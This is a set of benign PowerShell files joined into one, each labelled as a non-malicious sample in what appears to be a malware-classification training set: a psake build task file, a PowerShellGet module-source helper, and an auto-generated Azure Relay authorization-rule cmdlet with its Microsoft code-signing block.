# MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
# b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB
# 3p5InpafKEQ9AAEAAAHeMCIEID2hiK1qomnFBQKBgKWPbn5UzsuA1aMsE+kiWy5B
# b0ObMA0GCSqGSIb3DQEBCwUABIICAKT8tiBvWIUNt6P3AO69yT8U5tzztXc1sije
# Nj3N4X4Gkw0xk7zji0zmuZzMeWT4UKsp162sEtFmHWeocFDQOoJWiqLIc1wgj5g7
# IxWhZRmTIM9BsG2rQIPfCLLv1J+OVHbD7ZyMN4S39WRG+NZZDSsiA5JVB75c4BkK
# PuiR0fYiZTOKVroiXMO+FxfBCAR0/5FSidXJ9/J5WDonWi6Ti2l9tEt9ZGAwe+Ta
# LwfhOSadLbBiBhD+PIiYvkLI3F+8lblwAzrmNTISh/8Pa4mxtbwwJc2JoyAqBW2p
# EpuW8xnGK1igu0TPkhFjK/9HsT3jfOFUPHvctM+ZrUO+q18d4Ffa2uHrotgAFRRq
# FUaYagVi5QVLmuj3Hc6EDFkfVPMTlI8Oo5EaFdukiijvF+ax3DeTDSlB/GnChLpa
# Jz3sJuxsoFOcR1pq7AWpTSc7lEtkEudx8KSYpOVw9UVU0u7B5eafiWwPlzm6GjWr
# 2PWd2mymWqsWFQyYR8xdKJEMYHfba2c7LqXr2QHPyGwRcl4Xt4NbiSbqbBwfo7oF
# 7MC85dIwWHE2lC8dWZZIbVHP1nKD+0tgn3Lnjkk05VXayByQnwmYGySTpE1soUOW
# WE65ht9gUMAc0L0VL6ohMKmhudKARwMw0id86MdJEH6Jj7f6zpqQMK+TlpNrhgCx
# iM0NBQgN
# SIG # End signature block
|
combined_dataset/train/non-malicious/2939.ps1
|
2939.ps1
|
task default -depends Test
task Test -depends Compile, Clean -PreAction {"Pre-Test"} -Action {
Assert $false "This fails."
} -PostAction {"Post-Test"}
task Compile -depends Clean {
"Compile"
}
task Clean {
"Clean"
}
|
combined_dataset/train/non-malicious/4410.ps1
|
4410.ps1
|
function Set-ModuleSourcesVariable
{
[CmdletBinding()]
param(
[switch]
$Force,
$Proxy,
$ProxyCredential
)
if(-not $script:PSGetModuleSources -or $Force)
{
$isPersistRequired = $false
if(Microsoft.PowerShell.Management\Test-Path $script:PSGetModuleSourcesFilePath)
{
$script:PSGetModuleSources = DeSerialize-PSObject -Path $script:PSGetModuleSourcesFilePath
}
else
{
$script:PSGetModuleSources = [ordered]@{}
if(-not $script:PSGetModuleSources.Contains($Script:PSGalleryModuleSource))
{
$null = Set-PSGalleryRepository -Proxy $Proxy -ProxyCredential $ProxyCredential
}
}
$script:PSGetModuleSources.Keys | Microsoft.PowerShell.Core\ForEach-Object {
$moduleSource = $script:PSGetModuleSources[$_]
if(-not (Get-Member -InputObject $moduleSource -Name $script:ScriptSourceLocation))
{
$scriptSourceLocation = Get-ScriptSourceLocation -Location $moduleSource.SourceLocation -Proxy $Proxy -ProxyCredential $ProxyCredential
Microsoft.PowerShell.Utility\Add-Member -InputObject $script:PSGetModuleSources[$_] `
-MemberType NoteProperty `
-Name $script:ScriptSourceLocation `
-Value $scriptSourceLocation
if(Get-Member -InputObject $moduleSource -Name $script:PublishLocation)
{
if(-not $moduleSource.PublishLocation)
{
$script:PSGetModuleSources[$_].PublishLocation = Get-PublishLocation -Location $moduleSource.SourceLocation
}
Microsoft.PowerShell.Utility\Add-Member -InputObject $script:PSGetModuleSources[$_] `
-MemberType NoteProperty `
-Name $script:ScriptPublishLocation `
-Value $moduleSource.PublishLocation
}
$isPersistRequired = $true
}
}
if($isPersistRequired)
{
Save-ModuleSources
}
}
}
|
combined_dataset/train/non-malicious/sample_25_83.ps1
|
sample_25_83.ps1
|
# ----------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code
# is regenerated.
# ----------------------------------------------------------------------------------
<#
.Synopsis
Authorization rule for a namespace by name.
.Description
Authorization rule for a namespace by name.
.Example
{{ Add code here }}
.Example
{{ Add code here }}
.Inputs
Microsoft.Azure.PowerShell.Cmdlets.Relay.Models.IRelayIdentity
.Outputs
Microsoft.Azure.PowerShell.Cmdlets.Relay.Models.Api20211101.IAuthorizationRule
.Notes
COMPLEX PARAMETER PROPERTIES
To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables.
INPUTOBJECT <IRelayIdentity>: Identity Parameter
[AuthorizationRuleName <String>]: The authorization rule name.
[HybridConnectionName <String>]: The hybrid connection name.
[Id <String>]: Resource identity path
[NamespaceName <String>]: The namespace name
[PrivateEndpointConnectionName <String>]: The PrivateEndpointConnection name
[PrivateLinkResourceName <String>]: The PrivateLinkResource name
[RelayName <String>]: The relay name.
[ResourceGroupName <String>]: Name of the Resource group within the Azure subscription.
[SubscriptionId <String>]: Subscription credentials which uniquely identify the Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
.Link
https://learn.microsoft.com/powershell/module/az.relay/get-azrelayauthorizationrule
#>
function Get-AzRelayAuthorizationRule {
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.Relay.Models.Api20211101.IAuthorizationRule])]
[CmdletBinding(DefaultParameterSetName='List', PositionalBinding=$false)]
param(
[Parameter(ParameterSetName='Get', Mandatory)]
[Parameter(ParameterSetName='Get1', Mandatory)]
[Parameter(ParameterSetName='Get2', Mandatory)]
[Alias('AuthorizationRuleName')]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')]
[System.String]
# The authorization rule name.
${Name},
[Parameter(ParameterSetName='Get', Mandatory)]
[Parameter(ParameterSetName='Get1', Mandatory)]
[Parameter(ParameterSetName='Get2', Mandatory)]
[Parameter(ParameterSetName='List', Mandatory)]
[Parameter(ParameterSetName='List1', Mandatory)]
[Parameter(ParameterSetName='List2', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')]
[System.String]
# The namespace name
${Namespace},
[Parameter(ParameterSetName='Get', Mandatory)]
[Parameter(ParameterSetName='Get1', Mandatory)]
[Parameter(ParameterSetName='Get2', Mandatory)]
[Parameter(ParameterSetName='List', Mandatory)]
[Parameter(ParameterSetName='List1', Mandatory)]
[Parameter(ParameterSetName='List2', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')]
[System.String]
# Name of the Resource group within the Azure subscription.
${ResourceGroupName},
[Parameter(ParameterSetName='Get')]
[Parameter(ParameterSetName='Get1')]
[Parameter(ParameterSetName='Get2')]
[Parameter(ParameterSetName='List')]
[Parameter(ParameterSetName='List1')]
[Parameter(ParameterSetName='List2')]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')]
[System.String[]]
# Subscription credentials which uniquely identify the Microsoft Azure subscription.
# The subscription ID forms part of the URI for every service call.
${SubscriptionId},
[Parameter(ParameterSetName='Get1', Mandatory)]
[Parameter(ParameterSetName='List1', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')]
[System.String]
# The hybrid connection name.
${HybridConnection},
[Parameter(ParameterSetName='Get2', Mandatory)]
[Parameter(ParameterSetName='List2', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')]
[System.String]
# The relay name.
${WcfRelay},
[Parameter(ParameterSetName='GetViaIdentity', Mandatory, ValueFromPipeline)]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Models.IRelayIdentity]
# Identity Parameter
# To construct, see NOTES section for INPUTOBJECT properties and create a hash table.
${InputObject},
[Parameter()]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Azure')]
[System.Management.Automation.PSObject]
# The credentials, account, tenant, and subscription used for communication with Azure.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials}
)
process {
try {
if (('Get', 'Get1', 'Get2', 'List', 'List1', 'List2') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) {
$PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id
}
$parameterSet = $PSCmdlet.ParameterSetName
if ($parameterSet -eq 'List') {
Az.Relay.private\Get-AzRelayAuthorizationRule_List @PSBoundParameters
}
if ($parameterSet -eq 'List1') {
Az.Relay.private\Get-AzRelayAuthorizationRule_List1 @PSBoundParameters
}
if ($parameterSet -eq 'List2') {
Az.Relay.private\Get-AzRelayAuthorizationRule_List2 @PSBoundParameters
}
if ($parameterSet -eq 'Get') {
Az.Relay.private\Get-AzRelayAuthorizationRule_Get @PSBoundParameters
}
if ($parameterSet -eq 'Get1') {
Az.Relay.private\Get-AzRelayAuthorizationRule_Get1 @PSBoundParameters
}
if ($parameterSet -eq 'Get2') {
Az.Relay.private\Get-AzRelayAuthorizationRule_Get2 @PSBoundParameters
}
if ($parameterSet -eq 'GetViaIdentity') {
if ($InputObject.Id -ilike '*hybridConnections*') {
Az.Relay.private\Get-AzRelayAuthorizationRule_GetViaIdentity1 @PSBoundParameters
} elseif ($InputObject.Id -ilike '*wcfRelays*') {
Az.Relay.private\Get-AzRelayAuthorizationRule_GetViaIdentity2 @PSBoundParameters
} else {
Az.Relay.private\Get-AzRelayAuthorizationRule_GetViaIdentity @PSBoundParameters
}
}
} catch {
throw
}
}
}
# SIG # Begin signature block
# MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCANc20fqH1GSagn
# Ur2SP7C0jBY10FJB7Nt14kraJr5nfqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHGfx+DMH1F2H62b+Bh6ozhL
# nmIa5/OTV2naxJVlq9/gMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAfuzbuSArOsK5QPY3mg2fMrCFfumK14yaHjZR+2QzfADUT5+Zaf7W4kF1
# iRkU1rUV8k7qprCKDCajKBlSGz0SB0r23rg4waZKbb4Wrm7iRxfj8/5FrAg9fYwk
# qDGCn3dgiR/d7w86MM6Mw0HalI+HOruE/dNivEoHF+GwHDINEiscIEN2A0PKpUv7
# KD07np3kFQwefOOrO5XUvtgbq1l6nEeFS/phdr5/x6sNz42ADBQY5Ct6TKpZAlYn
# Kv9rs5gy8N8WqV2jqRM+xygxc6BhGgr3zL0wt7BLMUEPQNGLvy70zo1YEiPqB4D8
# DEva1OMYj+bKE+y0TrkCB96tR1fk7KGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC
# F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCAKpchIEdaaBscLQIK2n3OjiJW7rCI0TELWoxT/fLQQJgIGZhgNl26X
# GBMyMDI0MDQyMzEzMTUxMS45NjJaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHtMIIHIDCCBQigAwIBAgITMwAAAeqaJHLVWT9hYwABAAAB6jANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# MzBaFw0yNTAzMDUxODQ1MzBaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQC1C1/xSD8gB9X7Ludoo2rWb2ksqaF65QtJkbQpmsc6
# G4bg5MOv6WP/uJ4XOJvKX/c1t0ej4oWBqdGD6VbjXX4T0KfylTulrzKtgxnxZh7q
# 1uD0Dy/w5G0DJDPb6oxQrz6vMV2Z3y9ZxjfZqBnDfqGon/4VDHnZhdas22svSC5G
# HywsQ2J90MM7L4ecY8TnLI85kXXTVESb09txL2tHMYrB+KHCy08ds36an7IcOGfR
# mhHbFoPa5om9YGpVKS8xeT7EAwW7WbXL/lo5p9KRRIjAlsBBHD1TdGBucrGC3TQX
# STp9s7DjkvvNFuUa0BKsz6UiCLxJGQSZhd2iOJTEfJ1fxYk2nY6SCKsV+VmtV5ai
# PzY/sWoFY542+zzrAPr4elrvr9uB6ci/Kci//EOERZEUTBPXME/ia+t8jrT2y3ug
# 15MSCVuhOsNrmuZFwaRCrRED0yz4V9wlMTGHIJW55iNM3HPVJJ19vOSvrCP9lsEc
# EwWZIQ1FCyPOnkM1fs7880dahAa5UmPqMk5WEKxzDPVp081X5RQ6HGVUz6ZdgQ0j
# cT59EG+CKDPRD6mx8ovzIpS/r/wEHPKt5kOhYrjyQHXc9KHKTWfXpAVj1Syqt5X4
# nr+Mpeubv+N/PjQEPr0iYJDjSzJrqILhBs5pytb6vyR8HUVMp+mAA4rXjOw42vkH
# fQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFCuBRSWiUebpF0BU1MTIcosFblleMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQAog61WXj9+/nxVbX3G37KgvyoNAnuu2w3H
# oWZj3H0YCeQ3b9KSZThVThW4iFcHrKnhFMBbXJX4uQI53kOWSaWCaV3xCznpRt3c
# 4/gSn3dvO/1GP3MJkpJfgo56CgS9zLOiP31kfmpUdPqekZb4ivMR6LoPb5HNlq0W
# bBpzFbtsTjNrTyfqqcqAwc6r99Df2UQTqDa0vzwpA8CxiAg2KlbPyMwBOPcr9hJT
# 8sGpX/ZhLDh11dZcbUAzXHo1RJorSSftVa9hLWnzxGzEGafPUwLmoETihOGLqIQl
# Cpvr94Hiak0Gq0wY6lduUQjk/lxZ4EzAw/cGMek8J3QdiNS8u9ujYh1B7NLr6t3I
# glfScDV3bdVWet1itTUoKVRLIivRDwAT7dRH13Cq32j2JG5BYu/XitRE8cdzaJmD
# VBzYhlPl9QXvC+6qR8I6NIN/9914bTq/S4g6FF4f1dixUxE4qlfUPMixGr0Ft4/S
# 0P4fwmhs+WHRn62PB4j3zCHixKJCsRn9IR3ExBQKQdMi5auiqB6xQBADUf+F7hSK
# ZfbA8sFSFreLSqhvj+qUQF84NcxuaxpbJWVpsO18IL4Qbt45Cz/QMa7EmMGNn7a8
# MM3uTQOlQy0u6c/jq111i1JqMjayTceQZNMBMM5EMc5Dr5m3T4bDj9WTNLgP8SFe
# 3EqTaWVMOTCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
